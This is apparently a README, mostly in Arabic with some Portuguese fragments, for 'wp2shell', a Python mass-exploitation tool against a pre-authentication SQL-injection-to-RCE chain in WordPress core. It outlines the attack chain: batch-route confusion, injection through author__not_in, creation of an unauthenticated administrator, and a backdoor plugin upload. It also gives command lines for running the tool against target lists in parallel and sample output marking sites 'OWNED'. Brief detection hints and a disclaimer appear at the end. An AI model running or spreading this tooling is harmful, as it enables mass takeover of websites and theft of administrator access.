مستغل جماعي بلغة Python وكاشف لسلسلة RCE قبل المصادقة في نواة WordPress CVE-2026-63030 وCVE-2026-60137، تربط حقن SQL بالتنفيذ عن بُعد للتعليمات البرمجية.
| السمة | التفاصيل |
|---|---|
| معرّف CVE | CVE-2026-63030 (+ CVE-2026-60137) |
| السلسلة | wp2shell — تنفيذ تعليمات برمجية عن بُعد قبل المصادقة |
| الخطورة | 🔴 حرجة (CVSS 9.8) |
| الهدف | نواة WordPress (بدون إضافات) |
| المتأثر (RCE) | 6.9.0 – 6.9.4 و 7.0.0 – 7.0.1 |
| المتأثر (SQLi فقط) | 6.8.0 – 6.8.5 |
| تم الإصلاح | 6.8.6 / 6.9.5 / 7.0.2 (18/07/2026) |
| المصادقة المطلوبة | لا شيء |
ثغرتان متسلسلتان في نواة WordPress:
author__not_in الخاص بالفئة الداخلية WP_Query./wp-json/batch/v1 تُفقد تزامن مدخلات الدفعة، مما يجعل الطلب "يسقط" في المسار التالي.تحوّل السلسلة حقن SQL إلى تنفيذ تعليمات برمجية عن بُعد قبل المصادقة:
route confusion /wp-json/batch/v1 ─► SQLi no author__not_in
│ │
└──────────────┬─────────────────────┘
▼
UNION fake-post + oEmbed + changeset poisoning
▼
POST /wp/v2/users (roles: administrator) ← admin criado sem auth
▼
login → upload plugin backdoor → RCE
خيارات احتياطية: INTO OUTFILE مباشرة (صلاحية FILE) واستخراج أعمى للتجزئة + كسرها.
python wp2shell.py exploit -l targets.txt --cmd whoami --authorized -k -c 10 --delay 2
python wp2shell.py remote -l targets.txt --authorized --active-probe -c 20 -f csv -o scan.csv
| الخيار | الوصف |
|---|---|
-l, --targets-file | هدف واحد لكل سطر (قابل للتكرار، بلا حد) |
-u, --target | هدف واحد |
--cmd | الأمر المراد تنفيذه على الهدف |
--authorized | إلزامي (أو WP2SHELL_AUTHORIZED=1) |
-c, --concurrency | الأهداف المتوازية (1–32) |
--delay | SLEEP للتوقيت/الاستخراج (2 = قوي) |
--rate | الطلبات/ثانية لكل هدف |
-k, --insecure | تجاهل TLS |
--proxy | وسيط HTTP |
--wordlist / --password / --username | خيار احتياطي لبيانات الاعتماد |
--log / --owned / --results-csv | ملفات الإخراج |
[+] [14:22:31] https://target.com OWNED ✓1 ~0 ✗10
[~] [14:22:32] https://other.com ADMIN ✓1 ~1 ✗10
---- SUMMARY ----
[+] owned=1 [~] admin=1 [-] fail=10 [.] error=0
owned.txt — الأهداف التي تم اختراقها (shell URL)admins.txt — حسابات المدير المُنشأة دون تنفيذ RCE (بيانات الاعتماد)exploit_log.txt — تفاصيل لكل هدفresults.csv — ملخص (exit_code: 0=owned, 4=admin, 2=fail, 3=error)whl_page عبر SQLi) + مسارات شائعة├── wp2shell.py # exploit + detector
├── targets.txt # alvos (uma URL por linha)
├── owned.txt # RCE conseguido (auto-criado)
├── admins.txt # admins criados (auto-criado)
└── README.md
╔══════════════════════════════════════════════════════════════════╗
║ LEGAL DISCLAIMER ║
╠══════════════════════════════════════════════════════════════════╣
║ This tool is provided for EDUCATIONAL and AUTHORIZED ║
║ SECURITY TESTING purposes only. ║
║ Only use on systems you own or have explicit permission. ║
║ The author is NOT responsible for any misuse or damage. ║
╚══════════════════════════════════════════════════════════════════╝
/wp-json/batch/v1 و /?rest_route=/batch/v1wp-content/uploads/ و wp-content/plugins/ بحثًا عن ملفات PHP مشبوهة